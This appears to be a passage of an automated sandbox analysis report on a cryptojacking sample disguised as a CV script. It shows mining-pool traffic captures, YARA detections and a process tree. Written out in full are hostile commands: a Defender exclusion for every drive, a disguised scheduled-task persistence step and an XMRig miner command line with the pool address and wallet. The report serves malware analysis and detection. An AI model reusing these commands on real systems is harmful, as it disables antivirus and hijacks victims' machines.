b3 7b ac 70 05 23 f4 c6 c2 02 d4 ca ec ca e4 aa 19 36 d3 6a 6a 93 68 ab a2 b3 be 9d 2b 6c 9b a2 b6 85 38 50 8e 10 d8 04 bd eb 2c d2 23 9c b3 38 34 b9 6b 12 6a b9 29 99 63 91 3c a5
                                                                                                  Data Ascii: ,W=:pd2J5@Eq^qDR3k}`2K#?,eO?WK4X*{~R.Rq^EB1&5}zRR"kqdjcV/a7L3/^1,:HkM{p#6jjh+l8P,#84kj)c<
                                                                                                  2023-06-06 15:28:28 UTC2489INData Raw: 86 87 6f a3 a9 cd 7c 10 7b b2 b6 67 5f 21 31 5e dc 6d 17 3f 35 71 3d 4b 24 19 d9 92 61 a7 01 cd 59 56 d8 87 ce 7d 04 1f d5 99 16 c9 3f 7d 2c 2b 9d 3b a5 bd 2b c0 4d f9 af 5a 6e 3a a9 d5 64 40 d2 5d e2 22 74 03 3a 86 79 25 8a a8 c8 25 70 17 06 dd 80 e8 01 09 81 c0 00 07 0b 01 00 02 24 06 f1 07 01 12 53 0f d2 81 25 b9 65 e0 96 b8 e1 97 f1 0c f3 58 23 e2 23 03 01 01 05 5d 00 10 00 00 01 00 0c 81 b8 82 6e 0a 01 93 4c 22 1b 00 00
                                                                                                  Data Ascii: o|{g_!1^m?5q=K$aYV}?},+;+MZn:d@]"t:y%%p$S%eX##]nL"


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.649714141.94.96.144443C:\Users\Public\WindowsUpdate\mservice.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-06 15:28:56 UTC2489OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 69 35 70 4e 5a 6d 37 63 76 58 43 37 37 6e 48 7a 76 7a 68 52 65 41 66 61 56 62 4a 58 34 47 56 58 59 76 65 61 38 68 4b 68 55 58 48 55 5a 48 51 46 44 78 77 46 4a 4d 43 63 5a 7a 39 35 39 77 38 4b 45 4c 76 38 66 46 67 6b 36 44 4b 45 78 51 51 39 55 48 41 78 41 75 43 4a 35 61 62 62 75 22 2c 22 70 61 73 73 22 3a 22 30 36 30 36 2d 31 37 68 32 38 6d 22 2c 22 61 67 65 6e 74 22 3a 22 57 69 6e 64 6f 77 73 20 4e 65 74 77 6f 72 6b 20 53 65 72 76 69 63 65 2f 31 2e 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e
                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu","pass":"0606-17h28m","agent":"Windows Network Service/1.1.0 (Windows NT 10.0; Win64; x64) libuv/1.
                                                                                                  2023-06-06 15:28:56 UTC2490INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 33 61 64 63 32 66 38 63 2d 65 62 63 33 2d 34 39 32 31 2d 62 66 62 32 2d 62 34 35 30 35 35 35 34 63 65 31 62 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 32 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 34 30 65 39 31 64 30 34 64 39 36 34 65 35 36 62 32 34 32 34 61 37 36 32 38 36 32 37 32 36 38 63 64 33 63 31 36 61 64 34 34 37 38 37 33 63 62 64 39 61 39 36 33 65 61 39 36 64 38 35 35 66 36
                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"3adc2f8c-ebc3-4921-bfb2-b4505554ce1b","job":{"blob":"1010b2a1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c0000000040e91d04d964e56b2424a7628627268cd3c16ad447873cbd9a963ea96d855f6
                                                                                                  2023-06-06 15:29:00 UTC2490INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 34 63 39 61 66 37 63 34 65 64 62 38 64 62 36 39 35 34 30 36 62 31 34 36 36 66 66 30 64 31 66 33 66 35 62 32 66 63 39 65 36 61 32 65 65 31 66 33 33 62 64 31 31 63 38 31 64 64 36 66 64 33 63 35 30 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 37 4d 56 6f 62 71 77 4f 44 64 55 76 49 6d 6f 53 33 43 71 65 41 32 31 61 6e 78 50 4b 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bba1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c000000004c9af7c4edb8db695406b1466ff0d1f3f5b2fc9e6a2ee1f33bd11c81dd6fd3c50c","job_id":"7MVobqwODdUvImoS3CqeA21anxPK","target":"8
                                                                                                  2023-06-06 15:29:05 UTC2491INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 37 63 35 66 38 39 66 32 62 65 39 61 36 39 30 65 61 32 34 32 65 62 37 32 65 64 32 39 37 33 35 31 39 62 34 34 63 39 66 63 33 39 39 33 38 36 62 63 34 36 62 37 33 66 30 34 31 63 34 39 32 33 38 32 30 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 36 39 39 4e 4b 6c 62 2b 42 67 77 4d 45 6f 42 41 2b 51 65 76 6d 49 4c 6b 47 61 2b 22 2c 22 74 61 72 67 65 74 22 3a 22 30
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bba1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c000000007c5f89f2be9a690ea242eb72ed2973519b44c9fc399386bc46b73f041c4923820c","job_id":"c699NKlb+BgwMEoBA+QevmILkGa+","target":"0
                                                                                                  2023-06-06 15:29:19 UTC2491INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 66 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 33 36 63 31 32 36 30 62 39 33 65 61 37 66 36 38 32 33 64 35 35 64 33 64 38 38 36 38 64 38 33 62 34 30 62 39 65 37 30 34 65 37 33 39 61 37 39 32 65 31 66 38 64 61 37 62 34 65 33 62 35 35 38 63 30 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 70 2f 4f 78 5a 50 4d 48 51 51 35 61 45 7a 52 38 4f 38 59 62 41 4a 54 4e 34 59 4a 38 22 2c 22 74 61 72 67 65 74 22 3a 22 30
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cfa1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c0000000036c1260b93ea7f6823d55d3d8868d83b40b9e704e739a792e1f8da7b4e3b558c0f","job_id":"p/OxZPMHQQ5aEzR8O8YbAJTN4YJ8","target":"0
                                                                                                  2023-06-06 15:29:34 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 64 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 63 39 35 66 66 64 30 61 63 62 32 34 33 33 30 39 62 66 32 39 38 36 64 30 30 63 61 37 34 64 34 34 66 63 36 63 65 63 34 63 64 63 65 32 35 35 65 33 38 30 37 65 64 63 35 64 37 33 34 34 36 63 66 33 31 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6a 65 78 4b 55 71 6a 35 72 6c 67 2f 73 38 2f 45 69 4b 63 54 51 46 78 50 5a 53 39 51 22 2c 22 74 61 72 67 65 74 22 3a 22 30
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010dda1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c00000000c95ffd0acb243309bf2986d00ca74d44fc6cec4cdce255e3807edc5d73446cf315","job_id":"jexKUqj5rlg/s8/EiKcTQFxPZS9Q","target":"0
                                                                                                  2023-06-06 15:29:48 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 63 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 64 32 39 37 66 62 61 36 65 62 36 32 39 39 36 32 31 62 63 35 64 66 64 62 32 37 38 32 62 33 61 61 30 65 34 65 32 31 37 30 34 64 35 39 34 34 30 63 38 30 63 37 64 36 61 34 66 37 62 65 39 34 31 34 31 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 43 48 4e 43 67 31 2f 61 35 31 7a 4d 64 37 59 39 7a 62 42 62 42 58 70 73 49 2b 69 70 22 2c 22 74 61 72 67 65 74 22 3a 22 30
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eca1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c00000000d297fba6eb6299621bc5dfdb2782b3aa0e4e21704d59440c80c7d6a4f7be941417","job_id":"CHNCg1/a51zMd7Y9zbBbBXpsI+ip","target":"0
                                                                                                  2023-06-06 15:29:59 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 36 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 63 39 39 61 63 33 38 38 39 39 39 39 65 38 38 64 36 62 61 36 63 35 38 66 33 34 61 37 37 39 62 34 64 30 66 37 32 32 39 36 35 61 30 38 32 38 38 61 63 65 38 35 63 34 35 37 62 32 36 61 30 63 39 62 31 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 73 44 47 77 37 39 6a 4c 6d 6e 5a 4e 55 2b 45 39 31 54 56 5a 55 63 65 4d 51 33 6b 70 22 2c 22 74 61 72 67 65 74 22 3a 22 30
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f6a1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c00000000c99ac3889999e88d6ba6c58f34a779b4d0f722965a08288ace85c457b26a0c9b19","job_id":"sDGw79jLmnZNU+E91TVZUceMQ3kp","target":"0
                                                                                                  2023-06-06 15:30:06 UTC2493INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 36 61 31 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 33 32 38 38 61 66 37 64 30 34 32 38 32 37 34 61 32 31 31 64 30 35 61 37 62 66 63 64 38 62 65 65 30 35 63 37 62 36 64 32 33 37 32 38 64 35 32 65 64 64 38 34 34 38 37 63 66 34 35 35 65 32 39 63 31 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 48 71 77 38 4d 77 37 71 51 46 6f 72 46 48 76 2b 53 72 6c 4a 2f 65 57 78 62 67 78 52 22 2c 22 74 61 72 67 65 74 22 3a 22 39
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f6a1fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c000000003288af7d0428274a211d05a7bfcd8bee05c7b6d23728d52edd84487cf455e29c19","job_id":"Hqw8Mw7qQForFHv+SrlJ/eWxbgxR","target":"9
                                                                                                  2023-06-06 15:30:10 UTC2493INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 32 61 32 66 64 61 33 30 36 64 38 62 30 37 65 36 37 36 37 62 38 62 34 36 61 64 36 66 63 33 32 63 37 62 66 66 65 63 36 30 36 34 30 64 32 30 61 31 39 31 39 63 66 64 33 34 37 64 39 66 33 64 64 38 30 37 62 36 37 37 37 37 63 30 30 30 30 30 30 30 30 34 35 37 38 35 61 62 39 37 62 34 39 66 64 38 35 30 34 37 30 37 36 37 39 36 33 33 37 36 34 38 61 31 63 33 63 33 32 62 33 35 38 35 66 35 64 64 36 62 30 65 38 31 64 36 36 32 63 62 38 37 34 38 37 32 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 71 57 77 6e 63 33 69 47 4b 6a 41 49 46 53 61 59 50 41 54 35 66 77 7a 49 4c 65 53 34 22 2c 22 74 61 72 67 65 74 22 3a 22 39
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101082a2fda306d8b07e6767b8b46ad6fc32c7bffec60640d20a1919cfd347d9f3dd807b67777c0000000045785ab97b49fd85047076796337648a1c3c32b3585f5dd6b0e81d662cb8748720","job_id":"qWwnc3iGKjAIFSaYPAT5fwzILeS4","target":"9


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:17:25:49
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:17:25:52
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:17:25:56
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
                                                                                                  Imagebase:0x7ff7cb270000
                                                                                                  File size:273920 bytes
                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:17:25:56
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6da640000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:17:25:56
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
                                                                                                  Imagebase:0x7ff7466a0000
                                                                                                  File size:447488 bytes
                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:17:28:29
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Users\Public\7g.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
                                                                                                  Imagebase:0x3b0000
                                                                                                  File size:584704 bytes
                                                                                                  MD5 hash:F7D5BA4EC2A88F2FF1F0ABEC61108A0B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:17:28:30
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6da640000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:17:28:50
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
                                                                                                  Imagebase:0x7ff7cb270000
                                                                                                  File size:273920 bytes
                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:17:28:50
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6da640000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:17:28:50
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:17:28:50
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
                                                                                                  Imagebase:0x7ff7db310000
                                                                                                  File size:226816 bytes
                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:17:28:52
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:17:28:53
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Users\Public\WindowsUpdate\mservice.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
                                                                                                  Imagebase:0x7ff7a0a50000
                                                                                                  File size:4770304 bytes
                                                                                                  MD5 hash:CFC0000B993A31C11EF58AC53837E4E1
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 83%, ReversingLabs

                                                                                                  General

